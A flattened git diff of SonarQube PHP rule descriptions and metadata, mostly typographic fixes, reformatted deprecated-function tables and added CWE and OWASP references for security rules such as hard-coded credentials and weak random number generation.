keyword, was deprecated in early versions of PHP 5. Even though it’s not +considered deprecated in the most recent versions, it’s nonetheless not best practice to use it. Whenvar
does appear, it is interpreted as a synonym forpublic
and treated as such. Thereforepublic
should be used instead.From the PHP Manual:
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1780.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1780.json index 98fae1405a..5e4c13f9f8 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1780.json +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1780.json @@ -1,5 +1,5 @@ { - "title": "Closing tag \"?>\" should be omitted on files containing only PHP", + "title": "Closing tag \"?\u003e\" should be omitted on files containing only PHP", "type": "CODE_SMELL", "status": "ready", "remediation": { diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1788.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1788.html index dc622f6e75..91163cb7d6 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1788.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1788.html @@ -1,5 +1,5 @@The ability to define default values for method arguments can make a method easier to use. Default argument values allow callers to specify as many -or as few arguments as they want while getting the same functionality and minimizing boilerplate, wrapper code.
+or as few arguments as they want while getting the same functionality and minimizing boilerplate, wrapper code.But all method arguments with default values should be declared after the method arguments without default values. Otherwise, it makes it impossible for callers to take advantage of defaults; they must re-specify the defaulted values in order to "get to" the non-default arguments.
Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1799.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1799.html index 3179c91a74..13cf8cacbf 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1799.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1799.html @@ -1,5 +1,5 @@The
+user experience. In such case, the end user might have the feeling that the web site is down or has encountered a fatal error.exit(...)
anddie(...)
statements should absolutely not be used in Web PHP pages as this might lead to a very bad -user experience. In such case, the end user might have the feeling that the web site is down or has encountered a fatal error.But of course PHP can also be used to develop command line application and in such case use of
exit(...)
ordie(...)
statement can be justified but must remain limited and not spread all over the application. We expect exceptions to be used to handle errors and those exceptions should be caught just before leaving the application to specify the exit code with help ofexit(...)
ordie(...)
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1799.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1799.json
index d4e4e9c2e8..d0d05860b0 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1799.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1799.json
@@ -6,9 +6,7 @@
 "func": "Constant\/Issue",
 "constantCost": "20min"
 },
- "tags": [
-
- ],
+ "tags": [],
 "defaultSeverity": "Blocker",
 "ruleSpecification": "RSPEC-1799",
 "sqKey": "S1799",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1848.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1848.json
index 3fc53c86d5..61f71f00dd 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1848.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1848.json
@@ -6,9 +6,7 @@
 "func": "Constant\/Issue",
 "constantCost": "5min"
 },
- "tags": [
-
- ],
+ "tags": [],
 "defaultSeverity": "Major",
 "ruleSpecification": "RSPEC-1848",
 "sqKey": "S1848",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1854.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1854.html
index 2917b7245e..d58486d256 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1854.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1854.html
@@ -1,5 +1,5 @@A dead store happens when a local variable is assigned a value that is not read by any subsequent instruction. Calculating or retrieving a value -only to then overwrite it or throw it away, could indicate a serious error in the code. Even if it's not an error, it is at best a waste of resources. +only to then overwrite it or throw it away, could indicate a serious error in the code. Even if it’s not an error, it is at best a waste of resources. Therefore all calculated values should be used.
Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1862.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1862.html index 6978905b5f..9e7de4091c 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1862.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1862.html @@ -1,9 +1,9 @@A
-switch
and a chain ofif
/else if
statements is evaluated from top to bottom. At most, only one branch will be executed: the first one with a condition that evaluates totrue
.Therefore, duplicating a condition automatically leads to dead code. Usually, this is due to a copy/paste error. At best, it's simply dead code and -at worst, it's a bug that is likely to induce further bugs as the code is maintained, and obviously it could lead to unexpected behavior.
+Therefore, duplicating a condition automatically leads to dead code. Usually, this is due to a copy/paste error. At best, it’s simply dead code and +at worst, it’s a bug that is likely to induce further bugs as the code is maintained, and obviously it could lead to unexpected behavior.
For a
+there is the risk in this situation that future maintenance will be done on the dead case, rather than on the one that’s actually used.switch
, if the first case ends with abreak
, the second case will never be executed, rendering it dead code. Worse -there is the risk in this situation that future maintenance will be done on the dead case, rather than on the one that's actually used.On the other hand, if the first case does not end with a
break
, both cases will be executed, but future maintainers may not notice that.Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1871.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1871.html index c447b64159..f741cb7785 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1871.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1871.html @@ -1,6 +1,6 @@Having two
+be combined, or for acases
in aswitch
statement or two branches in anif
chain with the same implementation is at best duplicate code, and at worst a coding error. If the same logic is truly needed for both instances, then in anif
chain they should -be combined, or for aswitch
, one should fall through to the other.switch
, one should fall through to the other.Noncompliant Code Example
switch ($i) { @@ -47,7 +47,7 @@Exceptions
But this exception does not apply to
+clauses, rule {rule:php:S3923} raises a bug.if
chains withoutelse
-s, or toswitch
-es without default clauses when all branches have the same single line of code. In case ofif
chains withelse
-s, or ofswitch
-es with default -clauses, rule {rule:php:S3923} raises a bug.if ($a >= 0 && $a < 10) { doTheThing(); diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1998.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1998.html index 5d4d4348fa..0c7488c854 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1998.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S1998.html @@ -1,11 +1,11 @@Passing a reference to a function parameter means that any modifications the method makes to the parameter will be made to the original value as well, since references have the effect of pointing two variables at the same memory space. This feature can be difficult to use correctly, particularly if the callee is not expecting a reference, and the improper use of references in function calls can make code less efficient rather than -more efficient.
-Further, according to the PHP manual:
+more efficient. +Further, according to the PHP manual:
- As of PHP 5.3.0, you will get a warning saying that "call-time pass-by-reference" is deprecated... And as of PHP 5.4.0, call-time pass-by-reference - was removed, so using it will raise a fatal error. +As of PHP 5.3.0, you will get a warning saying that "call-time pass-by-reference" is deprecated… And as of PHP 5.4.0, call-time + pass-by-reference was removed, so using it will raise a fatal error.
Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2000.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2000.json index b5a5755279..51f64a92e2 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2000.json +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2000.json @@ -1,5 +1,5 @@ { - "title": "Files should not contain characters before \"The following functions were deprecated in PHP 5:
- +
+ ++ + + + Deprecated Use Instead - - call_user_method()
+ call_user_func()
+
call_user_method()
call_user_func()
- - call_user_method_array()
+ call_user_func_array()
+
call_user_method_array()
call_user_func_array()
- + define_syslog_variables()
define_syslog_variables()
- + dl()
dl()
- - ereg()
+ preg_match()
+
ereg()
preg_match()
- - ereg_replace()
+ preg_replace()
(note that this is deprecated in PHP 5.5)+
ereg_replace()
preg_replace()
(note that this is deprecated in PHP 5.5)- - eregi()
+ preg_match()
with 'i' modifier+
eregi()
preg_match()
with 'i' modifier- - eregi_replace()
+ preg_replace()
with 'i' modifier+
eregi_replace()
preg_replace()
with 'i' modifier- + set_magic_quotes_runtime()
and its alias,magic_quotes_runtime()
set_magic_quotes_runtime()
and its alias,magic_quotes_runtime()
- - session_register()
+ $_SESSION
superglobal+
session_register()
$_SESSION
superglobal- - session_unregister()
+ $_SESSION
superglobal+
session_unregister()
$_SESSION
superglobal- - session_is_registered()
+ $_SESSION
superglobal+
session_is_registered()
$_SESSION
superglobal- - set_socket_blocking()
+ stream_set_blocking()
+
set_socket_blocking()
stream_set_blocking()
- - split()
+ preg_split()
+
split()
preg_split()
- - spliti()
+ preg_split()
with 'i' modifier+
spliti()
preg_split()
with 'i' modifier- + sql_regcase()
sql_regcase()
- - mysql_db_query()
+ mysql_select_db()
andmysql_query()
+
mysql_db_query()
mysql_select_db()
andmysql_query()
- - mysql_escape_string()
+ mysql_real_escape_string()
+
mysql_escape_string()
mysql_real_escape_string()
- Passing locale category names as strings -Use the LC_* family of constants ++ Passing locale category names as strings
Use the LC_* family of constants
The following functions were deprecated in PHP 7:
- +
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2002.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2002.html index 765f8d3387..4b632fb410 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2002.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2002.html @@ -1,4 +1,4 @@ -+ ++ + + + Deprecated Use Instead - - __autoload()
+ spl_autoload_register()
+
__autoload()
spl_autoload_register()
- - create_function()
anonymous function ++
create_function()
anonymous function
- - parse_str()
without second argument+ parse_str()
with second argument+
parse_str()
without second argument
parse_str()
with second argument- - gmp_random()
+ gmp_random_bits()
orgmp_random_range()
+
gmp_random()
gmp_random_bits()
orgmp_random_range()
- - each()
+ foreach
+
each()
foreach
- - assert()
with string argument+ +
assert()
with string argument- Defining case-insensitive constants by calling -define()
withtrue
as third parameter+ define("myconst", $value)
ordefine("myconst", $value, false)
+ Defining case-insensitive constants by calling
define()
withtrue
as third parameter
define("myconst", $value)
ordefine("myconst", $value, false)
- - FILTER_FLAG_SCHEME_REQUIRED
andFILTER_FLAG_HOST_REQUIRED
flags+ FILTER_VALIDATE_URL
flag+
FILTER_FLAG_SCHEME_REQUIRED
andFILTER_FLAG_HOST_REQUIRED
flags
FILTER_VALIDATE_URL
flag- - fgetss()
function,"string.strip_tags"
stream filter name,SplFileObject::fgetss()
method and -gzgetss()
function+ +
fgetss()
function,"string.strip_tags"
stream filter name,SplFileObject::fgetss()
method and +gzgetss()
function- mbregex_encoding()
,mbereg()
,mberegi()
,mbereg_replace()
, +-
mbregex_encoding()
,mbereg()
,mberegi()
,mbereg_replace()
,mberegi_replace()
,mbsplit()
,mbereg_match()
,mbereg_search()
,mbereg_search_pos()
,mbereg_search_regs()
,mbereg_search_init()
,mbereg_search_getregs()
, -mbereg_search_getpos()
,mbereg_search_setpos()
Use the +
correspondingmb_ereg_*()
variants insteadmbereg_search_getpos()
,mbereg_search_setpos()
+Use the
corresponding
mb_ereg_*()
variants instead- string search functions with integer needle ( -stristr
,strrchr
,strstr
,strripos
, -stripos
,strrpos
,strpos
,strchr
)use a string needle instead ++ string search functions with integer needle (
stristr
,strrchr
,strstr
,strripos
, +stripos
,strrpos
,strpos
,strchr
)use a string needle instead
- - image2wbmp()
+ imagewbmp()
+
image2wbmp()
imagewbmp()
- - Normalizer::NONE
+ +
Normalizer::NONE
- Defining an -assert()
function inside a namespaceuse the standard +assert()
function+ Defining an
assert()
function inside a namespaceuse the standard
assert()
functionJust as pain is your body's way of telling you something is wrong, errors are PHP's way of telling you there's something you need to fix. Neither +
Just as pain is your body’s way of telling you something is wrong, errors are PHP’s way of telling you there’s something you need to fix. Neither pain, nor PHP errors should be ignored.
Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2003.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2003.html index 25cd9c0d03..612b538b47 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2003.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2003.html @@ -3,7 +3,7 @@
require
includes a file but generates a fatal error if an error occurs in the process.
include
also includes a file, but generates only a warning if an error occurs.Predictably, the difference between
+andrequire
andrequire_once
is the same as the difference betweeninclude
-andinclude_once
- the "_once" versions ensure that the specified file is only included once.include_once
- the "_once" versions ensure that the specified file is only included once.Because including the same file multiple times could have unpredictable results, the "once" versions are preferred.
Because
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2003.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2003.json
index 40f9bd911a..a1ba664b92 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2003.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2003.json
@@ -6,9 +6,7 @@
 "func": "Constant\/Issue",
 "constantCost": "5min"
 },
- "tags": [
-
- ],
+ "tags": [],
 "defaultSeverity": "Minor",
 "ruleSpecification": "RSPEC-2003",
 "sqKey": "S2003",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2007.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2007.html
index e93dbd5a5e..2ee6f0756c 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2007.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2007.html
@@ -7,7 +7,7 @@
generates only warnings, it should be used only when the file is being included conditionally, i.e. when all possible error conditions have been checked beforehand.It is difficult to properly test classes that use global functions. Instead of being declared globally, such variables and functions should be moved into a class, potentially marked
+be used without a class instance.static
, so they can -be used without a class instance.This rule checks that only object-oriented programming is used and that no functions or procedures are declared outside of a class.
Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2010.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2010.json
index 75fec51102..265f4c6508 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2010.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2010.json
@@ -1,5 +1,5 @@
 {
- "title": "\"&&\" and \"||\" should be used",
+ "title": "\"\u0026\u0026\" and \"||\" should be used",
 "type": "CODE_SMELL",
 "status": "ready",
 "remediation": {
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2011.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2011.html
index 46c392a158..cf8226c64f 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2011.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2011.html
@@ -1,5 +1,5 @@Global variables are a useful construct, but they should not be abused. Functions can access the global scope either through the -
global
keyword or though the$GLOBALS
array, but these practices considerably reduce the function's readability and +global
keyword or though the$GLOBALS
array, but these practices considerably reduce the function’s readability and reusability. Instead, the global variable should be passed as a parameter to the function.Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2014.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2014.json
index e5608f0aed..63d794f66e 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2014.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2014.json
@@ -6,9 +6,7 @@
 "func": "Constant\/Issue",
 "constantCost": "15min"
 },
- "tags": [
-
- ],
+ "tags": [],
 "defaultSeverity": "Blocker",
 "ruleSpecification": "RSPEC-2014",
 "sqKey": "S2014",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2036.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2036.html
index a2ffb4baa8..2203e4768d 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2036.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2036.html
@@ -1,7 +1,7 @@Files that define symbols such as classes and variables may be included into many files. Simply performing that inclusion should have no effect on those files other than declaring new symbols. For instance, a file containing a class definition should not also contain side-effects such as
+side-effect-only files. The type of operation which is not allowed in a symbol-definition file includes but is not limited to:
- generating output
- modifying
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2044.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2044.html index d6ed045e15..15412b546c 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2044.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2044.html @@ -1,5 +1,5 @@ini
settingsBoth
+referencing the constant.php_sapi_name()
and thePHP_SAPI
constant give the same value. But calling the method is less efficient that simply -referencing the constant.Noncompliant Code Example
if (php_sapi_name() == 'test') { ... } diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2050.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2050.html index 40d13f4ca0..c8c37eba6e 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2050.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2050.html @@ -1,79 +1,85 @@Certain functions exist in PHP only as aliases of other functions. These aliases have been made available for backward compatibility, but should -really be removed from code.
+really be removed from code.This rule looks for uses of the following aliases:
- +
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2068.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2068.html index 703c217618..e16bb3963e 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2068.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2068.html @@ -5,10 +5,10 @@+ ++ + + + Alias Replacement - - chop
+ rtrim
+
chop
rtrim
- - close
+ closedir
+
close
closedir
- - doubleval
+ floatval
+
doubleval
floatval
- - fputs
+ fwrite
+
fputs
fwrite
- - ini_alter
+ ini_set
+
ini_alter
ini_set
- - is_double
+ is_float
+
is_double
is_float
- - is_integer
+ is_int
+
is_integer
is_int
- - is_long
+ is_int
+
is_long
is_int
- - is_real
+ is_float
+
is_real
is_float
- - is_writeable
+ is_writable
+
is_writeable
is_writable
- - join
+ implode
+
join
implode
- - key_exists
+ array_key_exists
+
key_exists
array_key_exists
- - magic_quotes_runtime
+ set_magic_quotes_runtime
+
magic_quotes_runtime
set_magic_quotes_runtime
- - pos
+ current
+
pos
current
- - show_source
+ highlight_file
+
show_source
highlight_file
- - sizeof
+ count
+
sizeof
count
- - strchr
+ strstr
+
strchr
strstr
CVE-2019-13466 CVE-2018-15389 -Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.
+Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.
This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.
-It's recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", ...
+It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", …
Ask Yourself Whether
- Credentials allows access to a sensitive component like a database, a file storage, an API or a service.
@@ -20,7 +20,7 @@Recommended Secure Coding Practices
- Store the credentials in a configuration file that is not pushed to the code repository.
- Store the credentials in a database.
-- Use your cloud provider's service for managing secrets.
+- Use your cloud provider’s service for managing secrets.
- If the a password has been disclosed through the source code: change it.
Sensitive Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2070.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2070.json
index 69fa200363..8cafe23de8 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2070.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2070.json
@@ -6,9 +6,7 @@
 "func": "Constant\/Issue",
 "constantCost": "30min"
 },
- "tags": [
-
- ],
+ "tags": [],
 "defaultSeverity": "Critical",
 "ruleSpecification": "RSPEC-2070",
 "sqKey": "S2070",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2077.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2077.html
index 7d68413343..172c0ec0c7 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2077.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2077.html
@@ -1,5 +1,5 @@Formatted SQL queries can be difficult to maintain, debug and can increase the risk of SQL injection when concatenating untrusted values into the -query. However, this rule doesn't detect SQL injections (unlike rule s3649), the goal is only to highlight complex/formatted queries.
+query. However, this rule doesn’t detect SQL injections (unlike rule {rule:php:S3649}), the goal is only to highlight complex/formatted queries.Ask Yourself Whether
- Some parts of the query come from untrusted values (like user inputs).
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2092.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2092.html index 52faf70fe2..27d0135891 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2092.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2092.html @@ -1,10 +1,10 @@When a cookie is protected with the
+request and thus cannot be observed by an unauthorized person during a man-in-the-middle attack.secure
attribute set to true it will not be send by the browser over an unencrypted HTTP -request and thus cannot be observed by an unauthorized person during a man-in-the-middle attack.Ask Yourself Whether
- the cookie is for instance a session-cookie not designed to be sent over non-HTTPS communication.
-- it's not sure that the website contains mixed content or not (ie - HTTPS everywhere or not)
+- it’s not sure that the website contains mixed content or not + (ie HTTPS everywhere or not)
There is a risk if you answered yes to any of those questions.
Recommended Secure Coding Practices
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2187.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2187.html index 30bb5afbb3..315f2f26fb 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2187.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2187.html @@ -1,4 +1,4 @@ -There's no point in having a PHPUnit test case without any test methods. Similarly, you shouldn't have a file in the tests directory which extends +
There’s no point in having a PHPUnit test case without any test methods. Similarly, you shouldn’t have a file in the tests directory which extends PHPUnit\Framework\TestCase but no tests in the file. Doing either of these things may lead someone to think that uncovered classes have been tested. Add some test method or make the class abstract if it is used by a real test case class.
Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2201.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2201.html index 39037edcff..ae72378222 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2201.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2201.html @@ -1,5 +1,5 @@ -When the call to a function doesn't have any side effect, what is the point of making the call if the results are ignored? In such cases, either -the function call is useless and should be dropped, or the source code doesn't behave as expected.
+When the call to a function doesn’t have any side effect, what is the point of making the call if the results are ignored? In such cases, either +the function call is useless and should be dropped, or the source code doesn’t behave as expected.
Noncompliant Code Example
strlen($name); // Noncompliant; "strlen" has no side effect diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2201.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2201.json index 5e3747f501..fb81f78172 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2201.json +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2201.json @@ -6,9 +6,7 @@ "func": "Constant\/Issue", "constantCost": "10min" }, - "tags": [ - - ], + "tags": [], "defaultSeverity": "Major", "ruleSpecification": "RSPEC-2201", "sqKey": "S2201", diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2234.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2234.json index 5542565b70..47f3ae7d1e 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2234.json +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2234.json @@ -6,9 +6,7 @@ "func": "Constant\/Issue", "constantCost": "5min" }, - "tags": [ - - ], + "tags": [], "defaultSeverity": "Major", "ruleSpecification": "RSPEC-2234", "sqKey": "S2234", diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2245.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2245.html index c704a01368..0b53c3a0de 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2245.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2245.html @@ -38,10 +38,15 @@See
- OWASP Top 10 2017 Category A3 - Sensitive Data Exposure
+- Mobile AppSec + Verification Standard - Cryptography Requirements
+- OWASP Mobile Top 10 2016 Category M5 - + Insufficient Cryptography
- MITRE, CWE-338 - Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)
- MITRE, CWE-330 - Use of Insufficiently Random Values
- MITRE, CWE-326 - Inadequate Encryption Strength
+- MITRE, CWE-1241 - Use of Predictable Algorithm in Random Number Generator
- CERT, MSC02-J. - Generate strong random numbers
- CERT, MSC30-C. - Do not use the rand() function for generating pseudorandom numbers
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2245.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2245.json
index 5cf08803a8..6c6e8e79f4 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2245.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2245.json
@@ -8,7 +8,8 @@
 },
 "tags": [
 "cwe",
- "owasp-a3"
+ "owasp-a3",
+ "owasp-m5"
 ],
 "defaultSeverity": "Critical",
 "ruleSpecification": "RSPEC-2245",
@@ -18,7 +19,8 @@
 "CWE": [
 338,
 330,
- 326
+ 326,
+ 1241
 ],
 "OWASP": [
 "A3"
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2251.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2251.html
index 62fbda1b8b..3969eb807b 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2251.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2251.html
@@ -1,5 +1,5 @@A
+reach its stop condition, but in doing so, it will run many, many more times than anticipated, potentially causing unexpected behavior.for
loop with a counter that moves in the wrong direction is not an infinite loop. Because of wraparound, the loop will eventually -reach its stop condition, but in doing so, it will run many, many more times than anticipated, potentially causing unexpected behavior.Noncompliant Code Example
for ($i = 0; $i < $length; $i--) { // Noncompliant diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2251.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2251.json index be38cf9ba2..914149fc74 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2251.json +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2251.json @@ -6,9 +6,7 @@ "func": "Constant\/Issue", "constantCost": "5min" }, - "tags": [ - - ], + "tags": [], "defaultSeverity": "Major", "ruleSpecification": "RSPEC-2251", "sqKey": "S2251", diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2255.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2255.html index 6e9d1a0c81..b95f521d52 100644 --- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2255.html +++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2255.html @@ -16,7 +16,7 @@Recommended Secure Coding Practices
than the user session.Do not try to encode sensitive information in a non human-readable format before writing them in a cookie. The encoding can be reverted and the original information will be exposed.
-Using cookies only for session IDs doesn't make them secure. Follow Using cookies only for session IDs doesn’t make them secure. Follow OWASP best practices when you configure your cookies.
As a side note, every information read from a cookie should be Sanitized.
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2255.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2255.json
index 6e1d92f119..c243cd1ce4 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2255.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2255.json
@@ -6,9 +6,7 @@
 "func": "Constant\/Issue",
 "constantCost": "5min"
 },
- "tags": [
-
- ],
+ "tags": [],
 "defaultSeverity": "Minor",
 "ruleSpecification": "RSPEC-2255",
 "sqKey": "S2255",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2612.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2612.html
index 595a1870be..6794145264 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2612.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S2612.html
@@ -1,5 +1,5 @@In Unix, "
-others
" class refers to all users except the owner of the file and the members of the group assigned to this file.Granting permissions to this group can lead to unintended access to files.
+Granting permissions to this group can lead to unintended access to files.
Ask Yourself Whether
- The application is designed to be run on a multi-user environment.
